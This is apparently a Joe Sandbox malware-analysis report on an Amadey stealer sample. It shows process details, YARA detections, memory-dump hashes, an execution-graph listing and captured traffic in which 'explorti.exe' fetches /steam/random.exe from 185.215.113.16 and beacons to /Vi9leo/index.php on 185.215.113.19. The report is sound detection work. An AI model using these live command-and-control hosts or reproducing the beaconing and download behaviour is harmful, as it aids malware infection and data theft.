                    Data Ascii: 113 <c>1000051000+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1000052000+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1000053001+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb0eefeb8846d934f48b15eaa495c49#<d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.449776185.215.113.16808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:04.618339062 CEST56OUTGET /steam/random.exe HTTP/1.1
                    Host: 185.215.113.16


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.449777185.215.113.16808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:09.647792101 CEST56OUTGET /steam/random.exe HTTP/1.1
                    Host: 185.215.113.16


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.449778185.215.113.16808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:14.671273947 CEST56OUTGET /steam/random.exe HTTP/1.1
                    Host: 185.215.113.16


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.449779185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:19.984755039 CEST182OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 31
                    Cache-Control: no-cache
                    Data Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                    Data Ascii: e0=1000051000&unit=246122658369
                    Sep 1, 2024 17:37:20.392621040 CEST182OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 31
                    Cache-Control: no-cache
                    Data Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                    Data Ascii: e0=1000051000&unit=246122658369
                    Sep 1, 2024 17:37:20.829418898 CEST182OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 31
                    Cache-Control: no-cache
                    Data Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                    Data Ascii: e0=1000051000&unit=246122658369


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.449783185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:26.051434040 CEST182OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 31
                    Cache-Control: no-cache
                    Data Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                    Data Ascii: e0=1000051000&unit=246122658369


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.449784185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:31.071960926 CEST182OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 31
                    Cache-Control: no-cache
                    Data Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                    Data Ascii: e0=1000051000&unit=246122658369


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.449786185.215.113.16808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:45.105902910 CEST56OUTGET /steam/random.exe HTTP/1.1
                    Host: 185.215.113.16


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.449787185.215.113.16808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:50.135140896 CEST56OUTGET /steam/random.exe HTTP/1.1
                    Host: 185.215.113.16


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.449788185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:37:55.165942907 CEST182OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 31
                    Cache-Control: no-cache
                    Data Raw: 65 30 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                    Data Ascii: e0=1000052000&unit=246122658369


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.449789185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:38:00.181507111 CEST182OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 31
                    Cache-Control: no-cache
                    Data Raw: 65 30 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                    Data Ascii: e0=1000052000&unit=246122658369


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.449790185.215.113.19808104C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Sep 1, 2024 17:38:05.199372053 CEST182OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 31
                    Cache-Control: no-cache
                    Data Raw: 65 30 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                    Data Ascii: e0=1000052000&unit=246122658369


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:11:35:59
                    Start date:01/09/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0xd60000
                    File size:1'900'032 bytes
                    MD5 hash:0F2694844EB16391E15196E17E545F0B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1711456271.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1670647097.0000000004870000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:11:36:02
                    Start date:01/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
                    Imagebase:0x530000
                    File size:1'900'032 bytes
                    MD5 hash:0F2694844EB16391E15196E17E545F0B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1699390143.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1739755921.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:11:36:02
                    Start date:01/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Imagebase:0x530000
                    File size:1'900'032 bytes
                    MD5 hash:0F2694844EB16391E15196E17E545F0B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1699866762.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1740065067.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:6
                    Start time:11:37:00
                    Start date:01/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Imagebase:0x530000
                    File size:1'900'032 bytes
                    MD5 hash:0F2694844EB16391E15196E17E545F0B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2279702263.0000000005070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Reset < >
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9f4088d3e65abdcf3e547c1c8f09180c0b16a7414e6cff0691e252a7b476a396
                      • Instruction ID: 52d76ade11084c34e1649be9d082d4d2437e13423cd3e51012bc5412a94264ca
                      • Opcode Fuzzy Hash: 9f4088d3e65abdcf3e547c1c8f09180c0b16a7414e6cff0691e252a7b476a396
                      • Instruction Fuzzy Hash: 342195FB39D111BDB146A4426B24AFB5A3EE1DA730372C42EF807C9502F2996A5E7131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3ed8914b3a2e583f523db12ede7160c5502c36cfb32ac15263c88aa5498fd4ff
                      • Instruction ID: c464eaf535f18d97bef61cdc0362031d6ca890465882b947a675d5aefb4d20cc
                      • Opcode Fuzzy Hash: 3ed8914b3a2e583f523db12ede7160c5502c36cfb32ac15263c88aa5498fd4ff
                      • Instruction Fuzzy Hash: 45213EFB38D111BDB146A4426B54AFB573EE1DA730372C42EF807C6502F2996A9E7131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 42f2b86f58dd044be2c4ddb09fe253f061026642f049d98f32230352967516ee
                      • Instruction ID: 8b8269e85d897c790aea5d85ac85ef13106f48108c7a3822cf3dd77da071c3ec
                      • Opcode Fuzzy Hash: 42f2b86f58dd044be2c4ddb09fe253f061026642f049d98f32230352967516ee
                      • Instruction Fuzzy Hash: 0C21FAFB38D111BDB146A4426B159FA6B3EE1DA730332C42FF807C9502F2996A5E7131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e33a17eb83391e64253fb65c93fe370517ec231a20243c9c64e38325ce05574a
                      • Instruction ID: 860235bb1453915c5a1773421bcff55227dbd328931d65846115ab5a1a97720b
                      • Opcode Fuzzy Hash: e33a17eb83391e64253fb65c93fe370517ec231a20243c9c64e38325ce05574a
                      • Instruction Fuzzy Hash: A7211DFB24D111BD7146A4426B24AFB573DD1DA730372C42EF807C5102F2956A5E3131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 40ef110d32f94b0fa079d3b1974a49fbb729be1233a22a72881cb7f9062815f6
                      • Instruction ID: fc8e3401c85d0895fa7846128bcb8cbd209050bfbc95ee2d9b6820b862149658
                      • Opcode Fuzzy Hash: 40ef110d32f94b0fa079d3b1974a49fbb729be1233a22a72881cb7f9062815f6
                      • Instruction Fuzzy Hash: 5921C8FB25D111BDB146A4426B249FA6B3EE1DA730372C42EF807C9102F2996A5E7131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 37f7fbac95c35aea801dc12ab0d8598a7d343da6e30ae7078e4116ce437555cb
                      • Instruction ID: b92f46e591351433b9e5d7fe5edb92d489f5a7e718ba3f0acdaa9393a20d7e00
                      • Opcode Fuzzy Hash: 37f7fbac95c35aea801dc12ab0d8598a7d343da6e30ae7078e4116ce437555cb
                      • Instruction Fuzzy Hash: A421F7FB24D211BDB146A4426B14AFB6B3EE5DA730372C42EF847C5102F2996E9E6131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d9c66c94580e1a0369ab8ba3887e43faa8b090fda4c7566a41904072d325b0be
                      • Instruction ID: 05156cebeeba9b7af719a3783b2bb8f7b899844423dfcae3a23523956488d732
                      • Opcode Fuzzy Hash: d9c66c94580e1a0369ab8ba3887e43faa8b090fda4c7566a41904072d325b0be
                      • Instruction Fuzzy Hash: 4611FCFB24C115BDB146A4826B14AFB6B3ED5DA730732C42FF843C9102F2995E5E6131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 884dd89a05e78eb63a55c6e28d33e71651f1dd8816b41b7ed074cc19ca6fd70b
                      • Instruction ID: 0c8f6d365ac1e5e16404ec38286da26f6d1e5e3d85c97508fdd4bdec41315871
                      • Opcode Fuzzy Hash: 884dd89a05e78eb63a55c6e28d33e71651f1dd8816b41b7ed074cc19ca6fd70b
                      • Instruction Fuzzy Hash: 5611DAFB24D111BDB146A5426F149FB6B3EE5DA730332C42EF842C5102F2992A5E7531
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6634c1e08220f43c91fa9b22bb58cd9afdc3a0af78bba6113e1908b3561c5bf8
                      • Instruction ID: 287e0bc17a1ee3b211ee2fd8bffcb3799b3deae0147698d6f91cd8431f0189c1
                      • Opcode Fuzzy Hash: 6634c1e08220f43c91fa9b22bb58cd9afdc3a0af78bba6113e1908b3561c5bf8
                      • Instruction Fuzzy Hash: F701ADF724C111BDB146A542AB14AFA1B3AE6DA631772C81EF847C4102F1486E9E6031
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 119601fead572bbbc718a2bba3e4c79b7170bd7cc4e47c7f241a004175925a92
                      • Instruction ID: a8c5f89a2949ffc5a8bca4fae8ac53c5880500ab7f84b9761e1e22b076ac01ca
                      • Opcode Fuzzy Hash: 119601fead572bbbc718a2bba3e4c79b7170bd7cc4e47c7f241a004175925a92
                      • Instruction Fuzzy Hash: BE012CF734D111BDB145A4426B149FA1B3EE6DB631372C81EF847C4102B2996A9D7131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50a23c483a7ce0ec9b4b885557b6ed6ecf0e230ce2904a45546c5550216463b0
                      • Instruction ID: 3fb7870d2a9e91acb9b9c3f215d508533ee6b8431e23364246d1ceeb0bd03db3
                      • Opcode Fuzzy Hash: 50a23c483a7ce0ec9b4b885557b6ed6ecf0e230ce2904a45546c5550216463b0
                      • Instruction Fuzzy Hash: DCF014FB35D111ADA149B0422B54ABB1A3EE2EB731372C52EF843C5502B2982A9E6135
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dfd59a959597ef255336bf662d7564a0ceeee573de31a98370fdb32f26f23c79
                      • Instruction ID: cd864cc2acb191a987f69619b7d50735ab3f5b15832e013c81067ee6b72f4cd3
                      • Opcode Fuzzy Hash: dfd59a959597ef255336bf662d7564a0ceeee573de31a98370fdb32f26f23c79
                      • Instruction Fuzzy Hash: D70149B734D151ADA306A4613A549F62F3CE5CB730373C56FF843C5802E2082A5EA232
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cb0afa676deeb84c35f22589a9e554dc5f19e79dd05b6d913bba3b85f78ecd05
                      • Instruction ID: 3e329367fd53071d42b9104b2903bc025f67297f292268761d05cc9b695d8e13
                      • Opcode Fuzzy Hash: cb0afa676deeb84c35f22589a9e554dc5f19e79dd05b6d913bba3b85f78ecd05
                      • Instruction Fuzzy Hash: D6F06DB724D211AEA255A9912A585BA2B3DE6DB730372C42EF403C5002F2886A5E6131
                      Memory Dump Source
                      • Source File: 00000000.00000002.1715136686.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4a80000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fbb72691a4f02ba4dd1c196515b6bdafb3f9e1a9d4f7e5d43370040804d23825
                      • Instruction ID: 343fe7f75f305a7dcdde2da5c281199525d1ba5350e841bee19cf22d65566a43
                      • Opcode Fuzzy Hash: fbb72691a4f02ba4dd1c196515b6bdafb3f9e1a9d4f7e5d43370040804d23825
                      • Instruction Fuzzy Hash: 4BE01AB724D115ADA248A4522A649FB2B3DE1DB731373C51FF843C5101F3486A1D7134

                      Execution Graph

                      Execution Coverage:11.5%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:10.7%
                      Total number of Nodes:1794
                      Total number of Limit Nodes:80
                      execution_graph 13099 566974 13100 566982 13099->13100 13101 56698c 13099->13101 13102 56b515 DeleteFileW 13100->13102 13110 5668bd 13101->13110 13104 566989 13102->13104 13105 5669a6 13113 56681d 13105->13113 13109 5669ba ___free_lconv_mon 13118 56683a 13110->13118 13112 5668cf 13112->13105 13180 56676b 13113->13180 13115 566835 13115->13109 13116 56b515 DeleteFileW 13115->13116 13117 56b527 __dosmaperr 13116->13117 13117->13109 13119 56685a 13118->13119 13123 566851 13118->13123 13119->13123 13124 56b4bb 13119->13124 13123->13112 13125 566890 13124->13125 13126 56b4ce 13124->13126 13128 56b4e8 13125->13128 13126->13125 13132 56f46b 13126->13132 13129 56b4fb 13128->13129 13131 56b510 13128->13131 13129->13131 13163 56e571 13129->13163 13131->13123 13134 56f477 __fassign 13132->13134 13133 56f4c6 13133->13125 13134->13133 13137 568aaf 13134->13137 13136 56f4eb 13138 568ab4 __fassign 13137->13138 13141 568abf ___std_exception_copy 13138->13141 13146 56d4f4 13138->13146 13143 56651d 13141->13143 13142 568af2 __dosmaperr __fassign 13142->13136 13151 5663f7 13143->13151 13147 56d500 __fassign 13146->13147 13148 56651d __fassign 2 API calls 13147->13148 13150 56d55c __dosmaperr __fassign ___std_exception_copy 13147->13150 13149 56d6ee __dosmaperr __fassign 13148->13149 13149->13141 13150->13141 13152 566405 __fassign 13151->13152 13153 566450 13152->13153 13156 56645b 13152->13156 13153->13142 13161 56a1c2 GetPEB 13156->13161 13158 566465 13159 56646a GetPEB 13158->13159 13160 56647a __fassign 13158->13160 13159->13160 13162 56a1dc __fassign 13161->13162 13162->13158 13164 56e57b 13163->13164 13167 56e489 13164->13167 13166 56e581 13166->13131 13171 56e495 __fassign ___free_lconv_mon 13167->13171 13168 56e4b6 13168->13166 13169 568aaf __fassign 2 API calls 13170 56e528 13169->13170 13172 56e564 13170->13172 13176 56a5ee 13170->13176 13171->13168 13171->13169 13172->13166 13177 56a611 13176->13177 13178 568aaf __fassign 2 API calls 13177->13178 13179 56a687 13178->13179 13181 566793 13180->13181 13186 566779 __dosmaperr __fassign 13180->13186 13182 56679a 13181->13182 13184 5667b9 __fassign 13181->13184 13182->13186 13187 566916 13182->13187 13185 566916 RtlAllocateHeap 13184->13185 13184->13186 13185->13186 13186->13115 13188 566924 13187->13188 13191 566955 13188->13191 13194 56af0b 13191->13194 13193 566935 13193->13186 13195 56af19 __fassign 13194->13195 13197 56af47 __dosmaperr 13194->13197 13196 56af34 RtlAllocateHeap 13195->13196 13195->13197 13196->13195 13196->13197 13197->13193 14133 53e410 14134 53e435 14133->14134 14136 53e419 14133->14136 14136->14134 14137 53e270 14136->14137 14138 53e280 __dosmaperr 14137->14138 14139 568979 3 API calls 14138->14139 14140 53e2bd 14139->14140 14141 54c0c9 std::_Xinvalid_argument RtlAllocateHeap 14140->14141 14143 53e40e 14141->14143 14142 53e435 14142->14136 14143->14142 14144 53e270 4 API calls 14143->14144 14144->14143 14278 53b0d0 14279 53b122 14278->14279 14280 547f30 RtlAllocateHeap 14279->14280 14281 53b163 14280->14281 14282 547870 RtlAllocateHeap 14281->14282 14283 53b20d 14282->14283 14832 5386b0 14833 5386b6 14832->14833 14834 5386d6 14833->14834 14835 5666e7 3 API calls 14833->14835 14836 5386d0 14835->14836 15076 53dfd0 recv 15077 53e032 recv 15076->15077 15078 53e067 recv 15077->15078 15079 53e0a1 15078->15079 15080 53e1c3 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 15079->15080 15081 54c5dc GetSystemTimePreciseAsFileTime 15079->15081 15082 53e1fe 15081->15082 15083 54c19a 10 API calls 15082->15083 15084 53e268 15083->15084 13198 541dd0 13354 547f30 13198->13354 13200 541e6b 13201 541ee8 13200->13201 13202 541e78 13200->13202 13203 547f30 RtlAllocateHeap 13201->13203 13204 547870 RtlAllocateHeap 13202->13204 13209 541f27 shared_ptr 13203->13209 13205 541e92 13204->13205 13206 535b20 RtlAllocateHeap 13205->13206 13207 541e99 13206->13207 13208 547870 RtlAllocateHeap 13207->13208 13211 541eaf 13208->13211 13210 542041 13209->13210 13213 542dd5 13209->13213 13214 541fbf 13209->13214 13243 542936 shared_ptr 13209->13243 13367 547870 13210->13367 13215 547870 RtlAllocateHeap 13211->13215 13605 548070 13213->13605 13218 547f30 RtlAllocateHeap 13214->13218 13219 541ec7 13215->13219 13217 542050 13378 535b20 13217->13378 13229 541fe3 shared_ptr 13218->13229 13220 547870 RtlAllocateHeap 13219->13220 13223 541edf 13220->13223 13221 542dda 13225 548070 RtlAllocateHeap 13221->13225 13228 547870 RtlAllocateHeap 13223->13228 13224 54c0c9 std::_Xinvalid_argument RtlAllocateHeap 13226 542e02 13224->13226 13235 542ddf 13225->13235 13611 54c109 13226->13611 13227 547f30 RtlAllocateHeap 13227->13210 13232 542afc 13228->13232 13229->13227 13229->13243 13231 54205b 13231->13221 13233 5420b2 13231->13233 13234 53e440 6 API calls 13232->13234 13236 547f30 RtlAllocateHeap 13233->13236 13234->13243 13608 54c0c9 13235->13608 13239 5420d7 shared_ptr 13236->13239 13238 547870 RtlAllocateHeap 13240 542142 13238->13240 13239->13235 13239->13238 13241 535b20 RtlAllocateHeap 13240->13241 13242 54214d 13241->13242 13244 547f30 RtlAllocateHeap 13242->13244 13243->13224 13245 542db0 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13243->13245 13246 5421b4 shared_ptr __dosmaperr 13244->13246 13246->13235 13385 568979 13246->13385 13249 542274 13249->13226 13251 5424b7 13249->13251 13252 54228d 13249->13252 13253 5423ba 13249->13253 13254 54256b 13249->13254 13295 5422e2 shared_ptr 13249->13295 13250 547870 RtlAllocateHeap 13257 542640 13250->13257 13256 547870 RtlAllocateHeap 13251->13256 13258 547870 RtlAllocateHeap 13252->13258 13259 547870 RtlAllocateHeap 13253->13259 13255 547870 RtlAllocateHeap 13254->13255 13260 542582 13255->13260 13261 5424ce 13256->13261 13262 547870 RtlAllocateHeap 13257->13262 13263 5422a4 13258->13263 13264 5423d1 13259->13264 13266 547870 RtlAllocateHeap 13260->13266 13267 547870 RtlAllocateHeap 13261->13267 13279 542652 13262->13279 13268 547870 RtlAllocateHeap 13263->13268 13265 547870 RtlAllocateHeap 13264->13265 13269 5423e9 13265->13269 13270 54259a 13266->13270 13271 5424e6 13267->13271 13272 5422bc 13268->13272 13273 547870 RtlAllocateHeap 13269->13273 13274 547870 RtlAllocateHeap 13270->13274 13275 547870 RtlAllocateHeap 13271->13275 13276 547870 RtlAllocateHeap 13272->13276 13287 542401 13273->13287 13277 5425b2 13274->13277 13278 5424fe 13275->13278 13280 5422d4 13276->13280 13595 538de0 13277->13595 13585 538f60 13278->13585 13284 542a83 13279->13284 13399 5666e7 13279->13399 13389 538c60 13280->13389 13285 547870 RtlAllocateHeap 13284->13285 13288 542a9d 13285->13288 13290 547f30 RtlAllocateHeap 13287->13290 13291 535b20 RtlAllocateHeap 13288->13291 13289 54268b 13292 547870 RtlAllocateHeap 13289->13292 13290->13295 13293 542aa4 13291->13293 13298 5426a0 shared_ptr __dosmaperr 13292->13298 13294 547870 RtlAllocateHeap 13293->13294 13296 542aba 13294->13296 13295->13243 13295->13250 13297 547870 RtlAllocateHeap 13296->13297 13299 542ad2 13297->13299 13298->13243 13301 568979 3 API calls 13298->13301 13300 547870 RtlAllocateHeap 13299->13300 13300->13223 13302 542759 13301->13302 13302->13226 13302->13243 13302->13284 13303 542781 13302->13303 13304 547870 RtlAllocateHeap 13303->13304 13305 542798 13304->13305 13306 547870 RtlAllocateHeap 13305->13306 13307 5427ad 13306->13307 13403 537780 13307->13403 13309 5427b6 13310 542a26 13309->13310 13311 5427d1 13309->13311 13313 547870 RtlAllocateHeap 13310->13313 13312 547870 RtlAllocateHeap 13311->13312 13314 5427db 13312->13314 13315 542a30 13313->13315 13316 535b20 RtlAllocateHeap 13314->13316 13317 535b20 RtlAllocateHeap 13315->13317 13318 5427e2 13316->13318 13319 542a37 13317->13319 13321 547870 RtlAllocateHeap 13318->13321 13320 547870 RtlAllocateHeap 13319->13320 13322 542a4d 13320->13322 13323 5427f8 13321->13323 13324 547870 RtlAllocateHeap 13322->13324 13325 547870 